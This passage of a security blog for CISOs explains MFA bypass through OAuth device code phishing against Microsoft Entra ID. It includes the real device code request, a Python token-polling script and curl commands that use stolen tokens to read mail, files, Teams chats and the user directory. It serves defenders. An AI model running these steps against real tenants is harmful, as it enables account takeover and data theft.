translate=\"no\">​</a></h2>\n<p>CISOs have treated MFA as a near-absolute control for years. The implicit assumption: if a user completed MFA, the session is legitimate. That assumption is now broken  not in edge cases, not theoretically, but in active, widespread campaigns documented by Microsoft, Proofpoint, Huntress, Wiz, and others throughout 2024–2025.</p>\n<p>The attacks covered in this post exploit a fundamental architectural truth about modern identity systems: <strong>authentication tokens are bearer artifacts</strong>. Once issued, they are trusted unconditionally by resource servers regardless of where they are presented. The attacker's goal has shifted from stealing credentials to stealing or intercepting tokens  and modern OAuth flows, designed for convenience and interoperability, hand attackers multiple legitimate mechanisms to accomplish this.</p>\n<p>This post covers three attack classes in technical depth:</p>\n<ol>\n<li class=\"\"><strong>OAuth Device Code Phishing</strong>  weaponizing a legitimate protocol flow to harvest tokens via social engineering, without ever hosting a phishing page</li>\n<li class=\"\"><strong>Token Replay / Session Hijacking</strong>  stealing issued tokens from browser storage, memory, or the macOS Keychain, then replaying them from attacker infrastructure</li>\n<li class=\"\"><strong>Primary Refresh Token (PRT) Abuse</strong>  the most powerful token in the Entra ID ecosystem, how it can be extracted or phished, and why it bypasses even phishing-resistant MFA claims</li>\n</ol>\n<p>For each: the exact attack flow, the commands and API calls involved, what Entra ID logs, what it misses, and specific KQL and detection logic you can deploy.</p>\n<hr>\n<h2 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"part-1--oauth-device-code-phishing-mfa-bypass-by-design\">Part 1  OAuth Device Code Phishing: MFA Bypass by Design<a href=\"https://inferencedefense.com/academy/blog-internal/mfa-bypass-device-code-phishing-token-replay-conditional-access#part-1--oauth-device-code-phishing-mfa-bypass-by-design\" class=\"hash-link\" aria-label=\"Direct link to Part 1  OAuth Device Code Phishing: MFA Bypass by Design\" title=\"Direct link to Part 1  OAuth Device Code Phishing: MFA Bypass by Design\" translate=\"no\">​</a></h2>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"11-understanding-the-legitimate-flow-rfc-8628\">1.1 Understanding the Legitimate Flow (RFC 8628)<a href=\"https://inferencedefense.com/academy/blog-internal/mfa-bypass-device-code-phishing-token-replay-conditional-access#11-understanding-the-legitimate-flow-rfc-8628\" class=\"hash-link\" aria-label=\"Direct link to 1.1 Understanding the Legitimate Flow (RFC 8628)\" title=\"Direct link to 1.1 Understanding the Legitimate Flow (RFC 8628)\" translate=\"no\">​</a></h3>\n<p>The OAuth 2.0 Device Authorization Grant (RFC 8628) was designed for devices with limited input capability  smart TVs, printers, IoT devices  that cannot support an interactive browser login. The flow works as follows:</p>\n<!-- -->\n<p>The critical design property: <strong>the device polling for the token and the user completing authentication are decoupled</strong>. The device code is the only link between them. This decoupling is the attack primitive.</p>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"12-the-attack-exact-http-flows\">1.2 The Attack: Exact HTTP Flows<a href=\"https://inferencedefense.com/academy/blog-internal/mfa-bypass-device-code-phishing-token-replay-conditional-access#12-the-attack-exact-http-flows\" class=\"hash-link\" aria-label=\"Direct link to 1.2 The Attack: Exact HTTP Flows\" title=\"Direct link to 1.2 The Attack: Exact HTTP Flows\" translate=\"no\">​</a></h3>\n<p>The attacker performs the following sequence. These are real API calls against Microsoft's identity platform:</p>\n<p><strong>Step 1  Attacker initiates the device code flow</strong></p>\n<div class=\"language-http codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-http codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">POST https://login.microsoftonline.com/common/oauth2/v2.0/devicecode HTTP/1.1</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">Content-Type: application/x-www-form-urlencoded</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">client_id=d3590ed6-52b3-4102-aeff-aad2292ab01c&amp;scope=openid+profile+email+offline_access+https://graph.microsoft.com/.default</span><br></span></code></pre></div></div>\n<p><code>d3590ed6-52b3-4102-aeff-aad2292ab01c</code> is the client ID for <strong>Microsoft Office</strong>  a public client registered by Microsoft, requiring no secrets. Attackers use legitimate Microsoft client IDs to request broad scopes without needing to register a malicious application, making app-consent-based detection useless.</p>\n<p><strong>Response:</strong></p>\n<div class=\"language-json codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-json codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">{</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  </span><span class=\"token property\" style=\"color:hsl(256, 54%, 50%)\">\"user_code\"</span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">:</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"ABCD-EFGH\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  </span><span class=\"token property\" style=\"color:hsl(256, 54%, 50%)\">\"device_code\"</span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">:</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"BAQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-....[long opaque string]\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  </span><span class=\"token property\" style=\"color:hsl(256, 54%, 50%)\">\"verification_uri\"</span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">:</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"https://microsoft.com/devicelogin\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  </span><span class=\"token property\" style=\"color:hsl(256, 54%, 50%)\">\"expires_in\"</span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">:</span><span class=\"token plain\"> </span><span class=\"token number\" style=\"color:hsl(212, 92%, 35%)\">900</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  </span><span class=\"token property\" style=\"color:hsl(256, 54%, 50%)\">\"interval\"</span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">:</span><span class=\"token plain\"> </span><span class=\"token number\" style=\"color:hsl(212, 92%, 35%)\">5</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  </span><span class=\"token property\" style=\"color:hsl(256, 54%, 50%)\">\"message\"</span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">:</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"To sign in, use a web browser to open the page https://microsoft.com/devicelogin and enter the code ABCD-EFGH to authenticate.\"</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">}</span><br></span></code></pre></div></div>\n<p><strong>Step 2  Attacker begins polling while sending phishing lure to victim</strong></p>\n<div class=\"language-python codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-python codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">import</span><span class=\"token plain\"> requests</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> time</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">device_code </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"BAQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-....\"</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">while</span><span class=\"token plain\"> </span><span class=\"token boolean\" style=\"color:hsl(356, 75%, 47%)\">True</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    r </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> requests</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">post</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"https://login.microsoftonline.com/common/oauth2/v2.0/token\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        data</span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">{</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"grant_type\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"urn:ietf:params:oauth:grant-type:device_code\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"client_id\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"d3590ed6-52b3-4102-aeff-aad2292ab01c\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"device_code\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"> device_code</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">}</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    resp </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> r</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">json</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">if</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"access_token\"</span><span class=\"token plain\"> </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">in</span><span class=\"token plain\"> resp</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">print</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"[+] Token acquired!\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">print</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"Access token:\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> resp</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"access_token\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">print</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"Refresh token:\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> resp</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"refresh_token\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">break</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">elif</span><span class=\"token plain\"> resp</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">get</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"error\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"> </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">==</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"authorization_pending\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        time</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">sleep</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token number\" style=\"color:hsl(212, 92%, 35%)\">5</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">elif</span><span class=\"token plain\"> resp</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">get</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"error\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"> </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">==</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"expired_token\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">print</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"[-] Code expired, regenerate\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">break</span><br></span></code></pre></div></div>\n<p><strong>Step 3  Victim receives phishing email, enters code on real Microsoft page</strong></p>\n<p>The victim navigates to <code>https://microsoft.com/devicelogin</code>  Microsoft's own domain, valid certificate, no phishing indicators  enters <code>ABCD-EFGH</code>, signs in with their real credentials, completes MFA (push, TOTP, whatever), and clicks \"Continue.\"</p>\n<p><strong>Step 4  Attacker's polling loop returns tokens</strong></p>\n<p>The moment the victim clicks \"Continue,\" the next poll returns:</p>\n<div class=\"language-json codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-json codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">{</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  </span><span class=\"token property\" style=\"color:hsl(256, 54%, 50%)\">\"token_type\"</span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">:</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"Bearer\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  </span><span class=\"token property\" style=\"color:hsl(256, 54%, 50%)\">\"scope\"</span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">:</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"openid profile email offline_access https://graph.microsoft.com/.default\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  </span><span class=\"token property\" style=\"color:hsl(256, 54%, 50%)\">\"expires_in\"</span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">:</span><span class=\"token plain\"> </span><span class=\"token number\" style=\"color:hsl(212, 92%, 35%)\">3599</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  </span><span class=\"token property\" style=\"color:hsl(256, 54%, 50%)\">\"access_token\"</span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">:</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"eyJ0eXAiOiJKV1QiLCJub25jZSI6....\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  </span><span class=\"token property\" style=\"color:hsl(256, 54%, 50%)\">\"refresh_token\"</span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">:</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"0.AUkA2...[90-day token]\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  </span><span class=\"token property\" style=\"color:hsl(256, 54%, 50%)\">\"id_token\"</span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">:</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"eyJ0eXAiOiJKV1Qi...\"</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">}</span><br></span></code></pre></div></div>\n<p>The attacker now has:</p>\n<ul>\n<li class=\"\">An <strong>access token</strong> valid for ~60 minutes, scoped to Microsoft Graph  immediate Graph API access</li>\n<li class=\"\">A <strong>refresh token</strong> valid for 90 days (or until explicitly revoked)  persistent access</li>\n</ul>\n<p>MFA was satisfied. By the victim. For the attacker's session. This is working as designed.</p>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"13-what-the-attacker-can-do-with-the-tokens\">1.3 What the Attacker Can Do With the Tokens<a href=\"https://inferencedefense.com/academy/blog-internal/mfa-bypass-device-code-phishing-token-replay-conditional-access#13-what-the-attacker-can-do-with-the-tokens\" class=\"hash-link\" aria-label=\"Direct link to 1.3 What the Attacker Can Do With the Tokens\" title=\"Direct link to 1.3 What the Attacker Can Do With the Tokens\" translate=\"no\">​</a></h3>\n<p>With the Graph API access token, the attacker immediately begins reconnaissance:</p>\n<div class=\"language-bash codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-bash codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># Enumerate all mailbox contents</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token function\" style=\"color:hsl(256, 54%, 50%)\">curl</span><span class=\"token plain\"> </span><span class=\"token parameter variable\" style=\"color:hsl(26, 100%, 29%)\">-H</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"Authorization: Bearer &lt;access_token&gt;\"</span><span class=\"token plain\"> </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">\\</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"https://graph.microsoft.com/v1.0/me/messages?</span><span class=\"token string variable\" style=\"color:hsl(26, 100%, 29%)\">$top</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">=100&amp;</span><span class=\"token string variable\" style=\"color:hsl(26, 100%, 29%)\">$select</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">=subject,from,receivedDateTime\"</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># Download all files from OneDrive</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token function\" style=\"color:hsl(256, 54%, 50%)\">curl</span><span class=\"token plain\"> </span><span class=\"token parameter variable\" style=\"color:hsl(26, 100%, 29%)\">-H</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"Authorization: Bearer &lt;access_token&gt;\"</span><span class=\"token plain\"> </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">\\</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"https://graph.microsoft.com/v1.0/me/drive/root/children\"</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># Enumerate Teams messages</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token function\" style=\"color:hsl(256, 54%, 50%)\">curl</span><span class=\"token plain\"> </span><span class=\"token parameter variable\" style=\"color:hsl(26, 100%, 29%)\">-H</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"Authorization: Bearer &lt;access_token&gt;\"</span><span class=\"token plain\"> </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">\\</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"https://graph.microsoft.com/v1.0/me/chats/getAllMessages\"</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># List all users in the tenant</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token function\" style=\"color:hsl(256, 54%, 50%)\">curl</span><span class=\"token plain\"> </span><span class=\"token parameter variable\" style=\"color:hsl(26, 100%, 29%)\">-H</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"Authorization: Bearer &lt;access_token&gt;\"</span><span class=\"token plain\"> </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">\\</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"https://graph.microsoft.com/v1.0/users?</span><span class=\"token string variable\" style=\"color:hsl(26, 100%, 29%)\">$top</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">=999&amp;</span><span class=\"token string variable\" style=\"color:hsl(26, 100%, 29%)\">$select</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">=displayName,mail,userPrincipalName,jobTitle\"</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># Get all groups and memberships (identify privileged groups)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 